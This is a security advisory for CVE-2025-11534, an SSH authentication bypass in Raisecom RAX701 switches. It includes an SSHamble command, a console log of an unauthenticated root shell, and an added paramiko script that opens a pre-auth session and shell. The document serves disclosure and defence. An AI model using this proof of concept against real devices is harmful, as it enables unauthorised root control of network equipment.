Products
- Raisecom RAX series devices
CVE
- CVE-2025-11534
Executive summary #
runZero has discovered an issue with Raisecom RAX701 devices, and is publishing this disclosure in accordance with runZero's standard disclosure policy today, October 21, 2025. CVE-2025-11534 has been assigned to this issue. Any questions about this disclosure should be directed to todb@runzero.com.
By skipping normal SSH authentication, a remote, unauthenticated attacker can gain control of Ethernet switches produced by Raisecom.
This issue is an instance of CWE-288, "Authentication Bypass Using an Alternate Path or Channel," and is estimated to have a CVSS 3.1 score of 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Technical details #
Raisecom produces Ethernet switches used to facilitate backhaul connections between ISPs and other businesses. Due to the way the device handles SSH authentication on port 10022/TCP (SSH) and port 830/TCP (NETCONF over SSH), an attacker can skip authentication entirely and open a session channel without ever completing ssh-userauth, giving access to the system root shell (10022/TCP) or the NETCONF service (830/TCP).
Affected Products #
This issue appears to affect the following devices:
- P200R002C53
- RAX701-GC-WP-01 P200R002C52
- RAX701-GC-WP-01 P200R002C53
Observed affected firmware versions include:
- 5.5.13_20180720
- 5.5.27_20190111
- 5.5.36_20190709
Example Attack #
This issue is most easily demonstrated by using the open source SSHamble research tool, using the command-line switches shown below.
./sshamble scan -L debug --interact=all -u root -p 10022,830 vuln.target.ip.addr
This results in skipping directly to the offered service, as shown in the lightly redacted console output, below.
time="1993-09-05 13:40:16" level=info msg="badkeys detection is not active, run `sshamble badkeys-update` to enable"
time="1993-09-05 13:40:22" level=debug msg="interaction enabled, starting stdin manager..."
time="1993-09-05 13:40:29" level=debug msg="vuln.target.ip.addr:10022 skip-ssh-userauth is running for user root"
time="1993-09-05 13:40:30" level=debug msg="vuln.target.ip.addr:830 is unreachable: dial tcp vuln.target.ip.addr:830: i/o timeout"
time="1993-09-05 13:40:31" level=info msg="scan processed 1 tasks in 10s"
time="1993-09-05 13:40:32" level=warning msg="vuln.target.ip.addr:10022 skip-ssh-userauth provided a session without ssh-userauth 'session': *******************************************************************\r\r\n * WARNING ! *\r\r\n * *\r\r\n * Access to this device is restricted to those individuals *\r\r\n * with specific Permission. *\r\r\n * *\r\r\n * UNAUTHORIZED ACCESS TO THIS DEVICE IS PROHIBITED *\r\r\n * *\r\r\n * You must have explicit, authorized permission to access or *\r\r\n * configure this device. Unauthorized attempts and actions *\r\r\n * to access or use this system may result in civil and/or *\r\r\n * criminal penalties. If you are not an authorized user, *\r\r\n * disconnect now. Any attempts to gain unauthorized access *\r\r\n * will be prosecuted to the fullest extent of the law. *\r\r\n *******************************************************************\r\r\n\r\r\n\r\r\n\r\r\n\r\r\n\r\r\n\r\r\nRAX701#\r\r\nRAX701#\r\r\nRAX701#\r\r\nRAX701#\r\r\nRAX701#\r\r\nRAX701#show version\r\r\n\r\r\nProduct Version: RAX701-GC-WP-01 P200R002C53\r\r\nSoftware Version: 5.5.36_20190709\r\r\nRITP Version: 5.4\r\r\nBootstrap Version: BOOTROM_1.0.2\r\r\nFPGA Version: fpga:1.7 \r\r\nHardware Version: A.14\r\r\n\r\r\nSystem MacAddress: REDACTED\r\r\nSerial number: REDACTED\r\r\nRAX701-GC with\r\r\n128 M bytes DRAM\r\r\n32 M bytes Flash Memory\r\r\n2.631 M bytes Free Flash Memory\r\r\n\r\r\nSystem uptime is 2 days, 4 hours, 2 minutes\r\r\n\r\r\nRAX701#\r\r\nRAX701#"
time="1993-09-05 13:40:38" level=debug msg="vuln.target.ip.addr:10022 skip-ssh-userauth is running for user root"
sshamble> pty
sshamble> shell
time="1993-09-05 13:40:41" level=info msg="vuln.target.ip.addr:10022 session spawned a subprocess"
Interacting with session on vuln.target.ip.addr:10022
Enter the sshamble shell with `^E`. Commands:
exit - Exit the session (aliases 'quit' or '.')
help - Show this help text (alias '?')
env a=1 b=2 - Set the specified environment variables (-w for wait mode)
pty - Request a pty on the remote session (-w for wait mode)
shell - Request the default shell on the session
exec cmd arg1 arg2 - Request non-interactive command on the session
signal sig1 sig2 - Send one or more signals to the subprocess, case-sensitive:
ABRT,ALRM,FPE,HUP,ILL,INT,KILL,PIPE,QUIT,SEGV,TERM,USR1,USR2
tcp host port - Make a test connection to a TCP host and port
unix path - Make a test connection to a Unix stream socket
break milliseconds - Send a 'break' request to the service
req cmd arg1 arg2 - Send a custom SSH request to the service
sub subsystem - Request a specific subsystem
send string - Send string to the session
sendb string - Send string to the session one byte at a time
wait cmd arg1 arg2 - Send another command and wait for a reply
sleep duration - Sleep for the specified duration (1s, 100ms)
time="1993-09-05 13:40:42" level=info msg="waiting for session to complete..."
*******************************************************************
* WARNING ! *
* *
* Access to this device is restricted to those individuals *
* with specific Permission. *
* *
* UNAUTHORIZED ACCESS TO THIS DEVICE IS PROHIBITED *
* *
* You must have explicit, authorized permission to access or *
* configure this device. Unauthorized attempts and actions *
* to access or use this system may result in civil and/or *
* criminal penalties. If you are not an authorized user, *
* disconnect now. Any attempts to gain unauthorized access *
* will be prosecuted to the fullest extent of the law. *
*******************************************************************
RAX701#help
Raisecom software provides advanced help. Anytime when you need help,
please press '?' at the command line.
If nothing matches, the help list will be empty. You must backspace
your command until the available options are shown when entering
a '?'.
Two styles of help are provided by Raisecom:
1. Full help is available when entering a command followed by a
space and a '?'. Help of this style show all arguments and their
meanings to you. For example, by entering 'show ?', all arguments
of 'show' command are listed.
2. Partial help is provided when an argument's prefix immediately
followed by a '?' is entered. Help of this style show you all the
command's arguments that match the input prefix. For example, by
entering 'show m?', the arguments begin with 'm' are listed.
RAX701#quit
Attacker value #
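The SSHamble run above performs one specific step: it completes the SSH key exchange and then sends SSH_MSG_CHANNEL_OPEN for a "session" without ever requesting the ssh-userauth service. The script below is an added example, not runZero's SSHamble code and not Raisecom's, that reproduces that single step with the third-party paramiko library so the check can be folded into an existing Python audit toolkit. It assumes paramiko is installed, takes the host and ports from the operator (defaulting to the two ports named in this advisory), and treats a confirmed channel as the finding: a conforming server refuses or disconnects on a pre-auth CHANNEL_OPEN, so whether a shell follows is only supporting evidence. Beyond requesting a pty and the default shell and reading the first bytes (the login banner and prompt), nothing is sent to the device.

```python
"""Check whether an SSH service confirms a session channel before ssh-userauth.

Added example (not runZero's or Raisecom's code). After key exchange it sends
SSH_MSG_CHANNEL_OPEN for a "session" without requesting ssh-userauth. A
conforming server refuses or disconnects; a server with the CWE-288 alternate
path confirms the channel. Host/port arguments are the operator's own; the
default ports are the two named in the advisory.
"""
import argparse
import socket
from dataclasses import dataclass

try:
    import paramiko  # third-party; only needed for a live probe, not for the logic
except ImportError:
    paramiko = None

# paramiko raises SSHException on refusal/timeout and EOFError when the server
# drops the connection; without paramiko installed fall back to a broad class.
SSHError = paramiko.SSHException if paramiko else Exception


@dataclass
class ProbeResult:
    host: str
    port: int
    bypass: bool
    detail: str


def check_transport(transport, timeout=5.0, read_evidence=True):
    """Run the check on a connected paramiko-style Transport.

    Returns (bypass, detail). Only the Transport/Channel methods called here are
    needed, so a stand-in object can exercise the same logic offline.
    """
    transport.start_client(timeout=timeout)  # banner, KEXINIT, NEWKEYS; no userauth
    if transport.is_authenticated():
        raise RuntimeError("transport unexpectedly authenticated")
    try:
        chan = transport.open_session(timeout=timeout)  # CHANNEL_OPEN before userauth
    except (SSHError, EOFError, OSError) as exc:
        return False, f"channel open refused before userauth: {exc!r}"
    detail = "session channel confirmed before userauth"
    if read_evidence:
        # Mirror SSHamble's `pty` / `shell` steps and keep the first bytes
        # (login banner, prompt) as evidence. Nothing is sent to the shell.
        try:
            chan.settimeout(timeout)
            chan.get_pty()
            chan.invoke_shell()
            first = chan.recv(4096).decode("utf-8", "replace")
            detail += "; shell output: " + first.strip()[:120]
        except (SSHError, EOFError, OSError) as exc:
            detail += f"; shell request failed: {exc!r}"
    chan.close()
    return True, detail


def probe(host, port, timeout=5.0):
    """Connect to host:port and run check_transport over a real SSH transport."""
    if paramiko is None:
        raise RuntimeError("paramiko is required for live probing (pip install paramiko)")
    sock = socket.create_connection((host, port), timeout=timeout)
    transport = paramiko.Transport(sock)
    try:
        bypass, detail = check_transport(transport, timeout)
    finally:
        transport.close()
    return ProbeResult(host, port, bypass, detail)


def main():
    ap = argparse.ArgumentParser(description="pre-auth SSH session channel check")
    ap.add_argument("host")
    ap.add_argument("-p", "--ports", default="10022,830",
                    help="comma-separated TCP ports (default: the two from the advisory)")
    ap.add_argument("-t", "--timeout", type=float, default=5.0)
    args = ap.parse_args()
    for port in (int(p) for p in args.ports.split(",")):
        try:
            r = probe(args.host, port, args.timeout)
        except OSError as exc:  # unreachable, as 830/TCP was in the log above
            print(f"{args.host}:{port} unreachable: {exc}")
            continue
        print(f"{args.host}:{port} {'VULNERABLE' if r.bypass else 'ok'} - {r.detail}")


if __name__ == "__main__":
    main()
```

Usage: `python3 preauth_check.py vuln.target.ip.addr` tests 10022/TCP and 830/TCP; `-p 22` tests a single port. The verdict is taken at the CHANNEL_OPEN step rather than at the shell because that is the point where a correct server must refuse; an OpenSSH server, for instance, never confirms a channel before authentication, so the shell request only adds the banner as evidence.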
By skipping SSH authentication, anyone with access to ports 10022/TCP or 830/TCP on affected devices can claim a root shell or the NETCONF service (respectively). Doing so would give an attacker unusually potent control over backhaul Ethernet services facilitated by these devices, providing a platform for further attacks on affected networks.
Although CISA reached out to the vendor, Raisecom, we have been unable to confirm this issue with the vendor, or to learn whether other devices or firmware versions are affected. As far as we're aware, no patch for this authentication issue had been provided by the vendor at the time of this disclosure.
Credit #
This issue was disclosed by runZero, was discovered by HD Moore, and disclosure was coordinated by Tod Beardsley and CISA.
Timeline #
- 2025-08-09 (Sat): Briefly demoed at DEF CON 33 in the presentation, Shaking Out Shells with SSHamble
- 2025-08-15 (Fri): PoC validated and this disclosure drafted
- 2025-08-19 (Tue): Disclosed to CISA as report VRF#25-08-QRYYL
- 2025-08-25 (Mon): CISA acknowledged as case VU#166934
- 2025-08-25 (Mon): CISA attempted contact with the vendor
- 2025-09-17 (Wed): More attempts to coordinate with the vendor
- 2025-10-21 (Tue): Public disclosure of CVE-2025-11534